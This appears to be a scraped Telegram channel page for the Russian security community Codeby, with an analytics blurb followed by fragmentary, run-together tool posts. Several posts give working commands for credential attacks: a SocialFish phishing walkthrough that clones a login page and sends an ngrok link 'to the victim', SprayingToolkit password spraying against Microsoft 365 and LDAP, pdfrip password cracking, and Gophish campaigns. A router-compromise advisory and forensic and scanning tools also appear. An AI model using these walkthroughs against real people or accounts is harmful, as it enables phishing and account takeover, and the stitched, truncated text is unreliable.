Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Показати більше📈 Аналітичний огляд Telegram-каналу Codeby
Канал Codeby (@codeby_sec) у мовному сегменті Російська є активним учасником. На даний момент спільнота об'єднує 36 838 підписників, посідаючи 3 509 місце в категорії Технології та додатки та 17 225 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 36 838 підписників.
За останніми даними від 29 серпня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 23, а за останні 24 години на 0, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 6.62%. Протягом перших 24 годин після публікації контент зазвичай збирає 4.11% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 2 437 переглядів. Протягом першої доби публікація в середньому набирає 1 514 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 14.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як edr, api, вектор, mitre, att&ck.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Завдяки високій частоті оновлень (останні дані отримано 30 серпня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
pip install -r requirements.txt --break-system-packages
📌Использование:
Запускаем утилиту и указываем логин и пароль для авторизации в WebUI.
python3 SocialFish.py <user> <pass>
Переходим по адресу, и попадаем в GUI, где отображается вся необходимая информация
http://0.0.0.0:5000/neptuneВ поле
Clone вставляем ссылку на сайт который хотим склонировать, а затем в поле Redirection вставляем сайт куда будет перенаправлять после ввода данных и нажимаем на молнию.
Далее с помощью ngrok открываем порт 5000 и отправляем ссылку жертве.
./ngrok http 5000
Пароль и логин сохранятся в разделе Successful attacks, в POST LOG.
Утилита не всегда хорошо копирует страницу, поэтому это подходит не всегдаPassword spraying — это метод атаки, при котором злоумышленник использует один пароль для проверки множества учётных записей, чтобы избежать блокировки из-за превышения лимита попыток авторизации.SprayingToolkit автоматизирует этот процесс, предоставляя функционал для масштабных атак на различные сервисы аутентификации. 🖥 Основные возможности SprayingToolkit 1️⃣ Поддержка множества протоколов: • Microsoft Active Directory (LDAP, RPC). • Outlook Web Access (OWA). • Microsoft 365 (Office365/Azure AD). • Other protocols (SMTP, IMAP, etc.). 2️⃣ Массовая проверка учетных записей: • Тестирование большого количества пользователей с использованием заданного списка паролей. • Настройка задержек между попытками для обхода механизмов защиты от брутфорса. 3️⃣ Гибкость настройки: • Поддержка кастомных конфигураций для различных сервисов. • Возможность адаптации под специфические инфраструктуры. 4️⃣ Интеграция с существующими утилитами: • Лёгкое объединение с другими инструментами, такими как CrackMapExec. 5️⃣ Логирование: • Генерация подробных отчётов о результатах атак, включая успешные попытки. ⬇️ Установка и использование 1️⃣ Установка SprayingToolkit: Убедитесь, что у вас установлен Python 3.x. Затем клонируйте репозиторий:
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
pip install -r requirements.txt
2️⃣ Запуск атаки:
Пример тестирования учетных записей в Microsoft 365:
spraying-toolkit o365 --userlist users.txt --passwordlist passwords.txt --delay 1
Для LDAP:
spraying-toolkit ldap --server ldap.example.com --userlist users.txt --passwordlist passwords.txt
STRING{69-420}, которые будут генерировать и использовать список слов с полным диапазоном чисел.
⏺️Возможность перебора дат. Можно указать год, в котором будет выполняться перебор всех 365 дней в формате DDMMYYYY. Данные комбинации довольно часто используется для паролей в PDF-файлах.
⏺️Возможность перебора чисел. Для этого необходимо указать диапазон чисел и программа выполнит перебор по всему диапазону.
⏺️По умолчанию используется метод перебора. Для этого требуется указать максимальную и, при необходимости, минимальную длину для поиска пароля, и в результате будут проверены все пароли длиной от 4 символов до указанного максимума, состоящие из букв и цифр (a-zA-Z0-9).
Установка возможна двумя способами:
1️⃣С помощью менеджера пакетов cargo
cargo install --git https://github.com/mufeedvh/pdfrip.git
2️⃣Сборка из исходного кода
git clone https://github.com/mufeedvh/pdfrip.git
cd pdfrip/
cargo build --release
💡Примеры использования
Простая атака методом перебора по словарю rockyou.txt
pdfrip -f encrypted.pdf wordlist rockyou.txt
Перебор чисел, дат в заданном диапазоне
pdfrip -f encrypted.pdf range 1000 9999
pdfrip -f encrypted.pdf date 1900 2000
Перебор произвольных строк длиной 3-8 символов
pdfrip -f encrypted.pdf default-query --max-length 8 --min-length 3
В случае если известен формат пароля, можно создать собственный список
pdfrip -f encrypted.pdf custom-query ALICE{1000-9999}
pdfrip -f encrypted.pdf custom-query DOC-ID{0-99}-FILE
Включение предшествующих нулей для пользовательских запросов (позволяет сопоставить, например 10 с 0010)
pdfrip -f encrypted.pdf custom-query ALICE{10-9999} --add-preceding-zerosНовая хакерская группа под названием Lapdogs активно использует устройства для малого офиса и дома (SOHO), такие как: маршрутизаторы и сетевые хранилища (NAS), для проведения кибератак. По данным исследователей, злоумышленники уже скомпрометировали более 1000 устройств, чтобы скрытно совершать атаки на подбор учетных данных, кражу информации и перемещение внутри корпоративных сетей.🟧 Этапы атаки Lapdogs используют уязвимости в прошивках SOHO-устройств или применяют атаки типа «угадывание пароля» (brute-force) для получения контроля. 🟧Использование уязвимостей и brute-force-атак - злоумышленники взламывают устройства, эксплуатируя известные уязвимости или подбирая пароли автоматизированными методами. 🟧 Перенастройка DNS-серверов - после взлома хакеры изменяют DNS-настройки, перенаправляя пользователей на подконтрольные серверы. 🟧 Установка прокси-серверов - на скомпрометированных устройствах развертываются скрытые прокси-сервисы для анонимизации вредоносного трафика. 🟧 Кража учетных данных - атакующие перехватывают логины и пароли пользователей, анализируя незащищенный сетевой трафик через взломанные устройства. 🟧Мишень атакующих Основной мишенью злоумышленников становятся бюджетные маршрутизаторы и сетевые хранилища (NAS) популярных производителей, включая: - TP-Link (особенно модели Archer серии C50/C20 и аналоги) - D-Link (DIR-615, DIR-825 и другие устаревшие модели) - Zyxel (многофункциональные шлюзы серий NBG и VMG) - QNAP (в основном бюджетные NAS серий TS-230 и TS-431) - Synology (устройства серии DS218 и DS120j)
Наибольшему риску подвержены устройства с неактуальными версиями прошивки (выпущенные более 2-3 лет назад без обновлений), а также те, где владельцы не изменили стандартные учетные данные (типовые комбинации вроде admin/admin, root/12345 или пустые пароли). Особую опасность представляют модели с открытым доступом к веб-интерфейсу управления из внешней сети.🟧 Если ваше SOHO-устройство уже могло быть скомпрометировано, обратите внимание: - Устройство передает или получает большой объем данных без видимой причины - Проверьте, не были ли подменены DNS-серверы в настройках маршрутизатора или NAS - На некоторых устройствах можно проверить список запущенных служб (например, через SSH или веб-интерфейс) - Если сайты загружаются медленно или вас перекидывает на подозрительные страницы, возможно, трафик перехватывается - Злоумышленники иногда меняют прошивку или конфигурацию, что может вызывать нестабильную работу 🟧Если вы обнаружили хотя бы один из этих симптомов, рекомендуется: 🟧Выполнить сброс устройства до заводских настроек 🟧Установить последнюю версию прошивки с официального сайта производителя 🟧Проверить другие устройства в сети на предмет заражения (например, с помощью антивирусных сканеров) 🟧Сменить все пароли (включая Wi-Fi и учетные записи администратора)
git clone https://gitlab.com/kalilinux/packages/nmap.git
cd nmap
📌Использование:
Для запуска GUI интерфейса используем следующую команду:
zenmapВ поле
Command можно скопировать команду для nmap.
Во вкладке Profile выбираем тип сканирования, который необходим
В поле Target вставляем IP нашей цели и нажимаем кнопку Scan.
Информация выведется в контектсном окне.
Swaks (SMTP Swiss Army Knife) — это мощный и универсальный инструмент для тестирования SMTP-серверов. Он позволяет отправлять электронные письма с использованием различных протоколов и методов аутентификации, предоставляя гибкость и удобство в проверке настроек серверов электронной почты.🖥 Основные возможности Swaks 1️⃣ Поддержка различных протоколов: • SMTP, ESMTP, LMTP. • Поддержка TLS (STARTTLS) и SSL для безопасного соединения. 2️⃣ Аутентификация: • Поддержка методов PLAIN, LOGIN, CRAM-MD5, DIGEST-MD5 и NTLM. • Проверка работы сервера с определёнными методами авторизации. 3️⃣ Настройка отправки сообщений: • Изменение заголовков, таких как From, To, Subject. • Добавление произвольного текста в тело письма. 4️⃣ Диагностика: • Подробный вывод всех этапов SMTP-транзакции. • Лёгкое обнаружение проблем, связанных с аутентификацией или доставкой. 5️⃣ Гибкость: • Интеграция с другими инструментами через команды оболочки. • Возможность использования в скриптах для автоматизации задач. ⬇️ Установка и использование ➡️ Установка: Swaks написан на языке Perl и не требует сложной установки. Вы можете загрузить его с GitHub или установить через пакетный менеджер:
sudo apt install swaks # Для Debian/Ubuntu
sudo dnf install swaks # Для Fedora
➡️ Пример базового использования:
Отправка простого тестового письма:
swaks --to test@example.com --server smtp.example.com➡️ Пример использования с аутентификацией: Тестирование SMTP с использованием аутентификации:
swaks --to user@example.com --server smtp.example.com --auth LOGIN --auth-user username --auth-password password➡️ Пример с использованием TLS: Проверка STARTTLS:
swaks --to admin@example.com --server smtp.example.com --tls
В настоящее время TSK поддерживает несколько файловых систем, таких как NTFS, FAT, exFAT, HFS+, Ext3, Ext4, UFS и YAFFS2.💡Основные функции: 💫Анализ данных 💫Доступ к заблокированным файлам 💫Поддержка различных файловых систем 💫Интеграция с другими инструментами 📎Установка: Инструмент уже есть в Kali Linux, но вы можете скачать исходный код отсюда:
https://gitlab.com/kalilinux/packages/sleuthkit.git
cd sleuthkit
📌Использование:
Создание образа диска:
Для тестирования утилиты нам нужен собственно образ диска, его можно получить следующей командой:
dd if=/dev/sdX of=[PATH_TO_IMAGE].dd bs=4M
Где, /dev/sdX - путь к диску, of=[PATH_TO_IMAGE] - путь куда сохранить файл.
Теперь запустим анализ образа:
fls -r -m / [PATH_TO_IMAGE].dd
Узнаём структуру разделов в образе диска:
mmls /home/kali/Desktop/out.ddwget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip
unzip gophish-v0.11.0-linux-64bit.zip
cd gophish
./gophish
2. Настройка:
После запуска откройте веб-интерфейс Gophish по умолчанию (http://localhost:3333) и войдите с учётными данными, предоставленными в консоли.
3. Создание кампании:
• Загрузите список целевых пользователей.
• Настройте шаблон письма и целевую страницу.
• Запустите кампанию и отслеживайте результаты в реальном времени.